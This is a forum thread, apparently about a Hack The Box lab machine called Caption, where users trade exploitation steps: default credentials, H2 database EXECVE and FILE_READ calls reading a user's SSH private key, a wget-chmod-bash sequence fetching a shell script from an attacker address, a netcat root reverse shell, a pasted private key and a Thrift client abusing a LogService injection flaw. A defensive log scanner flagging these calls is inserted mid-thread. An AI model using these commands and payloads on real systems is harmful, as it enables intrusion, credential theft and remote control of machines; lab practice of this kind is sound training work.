Posts: 3
Threads: 2
Joined: Jun 2024
I've seen it, let me explain: Go here: http://caption.htb:8080/admin/dbviewer with the password root:root. Find the rsa with the query: CALL EXECVE('cat /home/margo/.ssh/id_ecdsa'); copy it and ask chatgpt to sort it hahaha, and then start with the ecdsa
Posts: 196
Threads: 31
Joined: Apr 2024
Sep 15, 2024, 04:38 AM
(This post was last modified: Sep 15, 2024, 04:51 AM by maggi.)
could always upload a shell and get it that way.....
CALL REEXEC('wget http://10.10.XX.XX:8000/shell.sh')
CALL REEXEC('chmod +x shell.sh')
CALL REEXEC('bash shell.sh');
Also logging into caption.htb portal is admin:cFgjE@0%l0
idk what good that will do?
Posts: 94
Threads: 3
Joined: Aug 2024
what next guys?
Posts: 30
Threads: 2
Joined: Apr 2024
(Sep 14, 2024, 09:52 PM)local Wrote: for USER - I can get code execution but my reverse shells seem not to be working
(Sep 14, 2024, 09:54 PM)nomx1337 Wrote: Why do you need a shell when you can just cat the ssh private key?
(Sep 14, 2024, 10:00 PM)local Wrote:
└─$ ssh -i id_rsa margo@10.129.20.140
Load key "id_rsa": error in libcrypto
Ensure that your id_rsa key is in the correct OpenSSH format. After getting the id_rsa from (CALL EXECVE('cat /home/margo/.ssh/id_ecdsa');), put it into ChatGPT and ask it to format the key properly. Then change the permissions with 'chmod 600'.
Posts: 2
Threads: 0
Joined: Aug 2024
Sep 15, 2024, 07:55 AM
(This post was last modified: Sep 15, 2024, 07:58 AM by user142.)
http://10.129.204.201:8080/ root:root
////
http://10.129.204.201:8080/admin/dbviewer
////
SELECT CAST(FILE_READ('/home/margo/.ssh/id_ecdsa') AS VARCHAR);
////
$ echo "KEY_FROM_DB" | xxd -r -p
////
sudo nano id_ecdsa
chmod 600 id_ecdsa
////
ssh -i id_ecdsa margo@10.129.204.201
margo@caption:~$ ls
app copyparty-sfx.py gitbucket.war logs user.txt
margo@caption:~$ cat user.txt
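A defender-side check for the viewer abuse shown in these posts, added here and not part of the thread: it scans constructed access-log lines for the /admin/dbviewer endpoint and flags EXECVE, REEXEC and FILE_READ calls, marking the ones that touch SSH key paths. It assumes the viewer receives the SQL in a "query" URL parameter; the log lines and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Constructed access-log sample (not from the thread): the admin DB viewer reached
# with default credentials, assuming it receives the SQL in a "query" parameter.
SAMPLE_LOG = """\
10.10.14.5 - - [15/Sep/2024:04:38:00 +0000] "GET /admin/dbviewer?query=SELECT+*+FROM+users HTTP/1.1" 200 512
10.10.14.5 - - [15/Sep/2024:04:38:10 +0000] "GET /admin/dbviewer?query=CALL+EXECVE%28%27cat+%2Fhome%2Fmargo%2F.ssh%2Fid_ecdsa%27%29%3B HTTP/1.1" 200 1294
10.10.14.5 - - [15/Sep/2024:04:38:20 +0000] "GET /admin/dbviewer?query=CALL+REEXEC%28%27wget+http%3A%2F%2F10.10.14.5%3A8000%2Fshell.sh%27%29 HTTP/1.1" 200 40
10.10.14.5 - - [15/Sep/2024:04:38:30 +0000] "GET /admin/dbviewer?query=SELECT+CAST%28FILE_READ%28%27%2Fhome%2Fmargo%2F.ssh%2Fid_ecdsa%27%29+AS+VARCHAR%29%3B HTTP/1.1" 200 1300
10.10.14.5 - - [15/Sep/2024:04:38:40 +0000] "GET /admin/dbviewer?query=SELECT+count%28*%29+FROM+logs HTTP/1.1" 200 20
"""

# Functions the thread shows being abused through the viewer: OS command
# execution (EXECVE, REEXEC) and arbitrary file read (FILE_READ).
CALL_RE = re.compile(r"\b(EXECVE|REEXEC|FILE_READ)\s*\(", re.IGNORECASE)
KEY_MATERIAL_RE = re.compile(r"/\.ssh/|id_(?:rsa|ecdsa|ed25519)\b", re.IGNORECASE)
REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def dbviewer_query(target):
    # Decoded SQL sent to /admin/dbviewer, or None for any other path.
    parts = urlsplit(target)
    if parts.path != "/admin/dbviewer":
        return None
    # parse_qs undoes both '+' and %XX encoding, so the regexes see real SQL.
    return parse_qs(parts.query).get("query", [None])[0]

def scan_line(line):
    # One finding dict per line that carries a dangerous viewer call, else None.
    m = REQ_RE.match(line)
    if not m:
        return None
    sql = dbviewer_query(m["target"])
    if sql is None:
        return None
    call = CALL_RE.search(sql)
    if not call:
        return None
    return {
        "ts": m["ts"], "ip": m["ip"], "status": int(m["status"]),
        "function": call.group(1).upper(), "query": sql,
        # Reading private keys is the step the thread uses to reach the user account.
        "touches_key_material": bool(KEY_MATERIAL_RE.search(sql)),
    }

def scan_log(text):
    # Whole-log scan; ordinary SELECTs produce no findings.
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]
```

Running scan_log over the sample yields three findings, two of which read a private key; the plain SELECTs are ignored.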
Posts: 13
Threads: 2
Joined: Jun 2024
Guys, I just have something to clarify: everyone has the id_ecdsa, right? Can anyone confirm whether the first few words of your key look like this (before sorting it using GPT):
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaG
Posts: 41
Threads: 2
Joined: Sep 2023
(Sep 15, 2024, 05:40 AM)Liy4 Wrote: [quoted the exchange above]
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaGEy
LW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQSQxiAAOBdjkpWEZCyNVU/9nVmyOryfxXgikgtDBGwX
d+PYkz97OlMJIADx0dds8gR7SjxV+B1VJtRQJm4/wuIeAAAAoD9jQjY/Y0I2AAAAE2VjZHNhLXNo
YTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJDGIAA4F2OSlYRkLI1VT/2dWbI6vJ/FeCKSC0ME
bBd349iTP3s6UwkgAPHR12zyBHtKPFX4HVUm1FAmbj/C4h4AAAAhANMx8DVOUW4eIgnGT/me3cyq
yYE+X1jwTBAhFrydzDweAAAAAAECAwQFBgc=
-----END OPENSSH PRIVATE KEY-----
Posts: 28
Threads: 0
Joined: Sep 2024
Can anyone help with the root?
Posts: 28
Threads: 0
Joined: Dec 2023
Sep 15, 2024, 08:55 AM
(This post was last modified: Sep 15, 2024, 09:00 AM by local.)
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.20.127] 51902
bash: cannot set terminal process group (1035): Inappropriate ioctl for device
bash: no job control in this shell
root@caption:~# ls
ls
go
go.mod
go.sum
output.log
root.txt
server.go
root@caption:~# cat root.txt
cat root.txt
(Sep 15, 2024, 08:42 AM)Unbutton8074 Wrote: [quoted the key posted above]
SSH KEYS ARE NOT THE SAME IF YOU'RE USING RELEASE ARENA
Posts: 38
Threads: 1
Joined: Mar 2024
Sep 15, 2024, 09:24 AM
(This post was last modified: Sep 15, 2024, 09:27 AM by spamdegratis5.)
(Sep 15, 2024, 01:28 AM)0xwww Wrote: (Sep 14, 2024, 10:39 PM)spamdegratis5 Wrote: The way to root is using the thrift client and leveraging the LogService RCE.
Steps:
- clone the repo into margo's home and generate the Python files (easiest way: https://thrift.apache.org/tutorial/py.html)
thrift --gen py log_service.thrift
- scp the generated files to your attacker machine and install the thrift Python library (on your machine, in a virtual environment)
- create a file on the box using this format: {"user-agent":"your_payload'", "ip":"1.1.1.1"}
- locally forward port 9090 to your machine
- create a client in Python and execute it:
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService  # generated by: thrift --gen py log_service.thrift

def main():
    # 9090 is the LogService port forwarded from the box to localhost
    transport = TSocket.TSocket('127.0.0.1', 9090)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = LogService.Client(protocol)
    transport.open()
    try:
        # point the service at the JSON file created in the earlier step
        response = client.ReadLogFile("/path/to/file/created")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        transport.close()

if __name__ == "__main__":
    main()
I couldn't understand the first step, could you explain better?
Clone the LogService repository from GitBucket into margo's home, then enter the directory and run the above command; it should create a directory named gen-py that you need to download to your machine and continue from there.